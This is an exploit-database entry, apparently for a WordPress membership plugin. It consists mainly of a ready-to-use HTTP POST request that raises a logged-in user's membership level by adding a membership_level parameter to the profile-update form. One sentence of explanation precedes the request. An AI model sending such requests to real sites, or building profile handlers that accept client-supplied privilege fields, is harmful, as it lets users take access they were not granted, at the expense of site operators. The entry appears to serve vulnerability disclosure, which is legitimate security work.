## https://sploitus.com/exploit?id=WPEX-ID:724729D9-1C4A-485C-9C90-A27664C47C84
To increase the level, the attacker needs to add the membership_level parameter to the POST request sent when updating the profile.
POST /membership-login/membership-profile/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: [logged in user with membership level 2]
swpm_profile_edit_nonce_val=1c449c7f1a&_wp_http_referer=%2Fmembership-login%2Fmembership-profile%2F&email=user%40localhost.localhost&password=&password_re=&first_name=user_low&last_name=user_low&phone=&address_street=123&address_city=1234&address_state=123&address_zipcode=&country=&company_name=&swpm_editprofile_submit=Update&action=custom_posts&membership_level=3